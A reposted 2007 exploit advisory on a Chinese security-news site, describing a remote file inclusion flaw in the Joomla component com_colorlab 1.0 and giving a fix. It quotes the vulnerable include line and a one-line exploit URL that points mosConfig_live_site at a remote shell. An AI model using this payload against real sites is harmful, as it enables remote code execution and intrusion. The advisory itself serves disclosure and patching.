网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability  

Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability

2007-10-22  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

--------------------

网管网www.bitscn.com

Joomla com_colorlab Remote File Include 网管朋友网www_bitscn_net

--------------------

网管bitscn_com

Found : xoron

网管朋友网www_bitscn_net

--------------------

网管下载dl.bitscn.com

Download:
http://download.joomlaportal.ch/content/view/474/ 网管u家www.bitscn.net

--------------------

网管朋友网www_bitscn_net

Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );

网管u家bitscn.net

--------------------

网管u家www.bitscn.net

Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?

网管网www.bitscn.com

-------------------- 网管联盟bitsCN@com

How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes 网管u家www.bitscn.net

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); 网管u家u.bitscn@com

3-save and exit

网管联盟bitsCN_com

--------------------

网管联盟bitsCN_com

Thanx: mdx :) 网管联盟bitsCN_com

-------------------- 网管u家bitscn.net

TAGs     codes   this   to   _VALID_MOS   or   die   defined   before   2-write      
 上一篇:TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit   下一篇:KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit
相关文章列表
Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Scripteen Free Image Hosting Script 1.
2.PPMate PPMedia Class ActiveX Control B
3.Apache mod_jk 1.2.19 Remote Buffer Ove
4.Microsoft Access (Snapview.ocx 10.0.55
5.Cisco IOS 12.3(18) FTP Server Remote E
6.Trend Micro OfficeScan ObjRemoveCtrl A
7.Windows Media Encoder wmex.dll ActiveX
8.Linux Kernel <= 2.6.20 with DCCP Su
9.NaviCOPA Web Server 2.01 Remote Buffer
10.Simple Machines Forum <= 1.1.5 Admi
最新推荐文章:
1.Cheats Complete Website 1.1.1 (itemid)
2.Drinks Complete Website 2.1.0 (drinkid
3.BitDefender Online Scanner 8 ActiveX H
4.PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA
5.PHP COM extensions (inconsistent Win32
6.PHP 4.4.6 crack_opendict() Local Buffe
7.Internet Explorer ActiveX bgColor Prop
8.CVSTrac 2.0.0 Post-Attack Database Res
9.GuppY <= 4.5.16 Remote Commands Exe
10.Trend Micro VirusWall Buffer Overflow
网管论坛交流:
·什么样的游戏,什么样的爱情.
·大家来开心一下吧---看了会很开心的东西-
·中国人不可不知道的知识
·@@小鹏◎◎小鹏同志与某位女明星亲密接触
·◎◎小鹏◎◎发现不明生物,居然正在交配
·[图文]^^^版主是什么?????
·泡论坛的女人是好女人
·做个“水性杨花”的女人
·献给mm俱乐部的所有mm
·深圳一集团企业电脑基础应用培训教程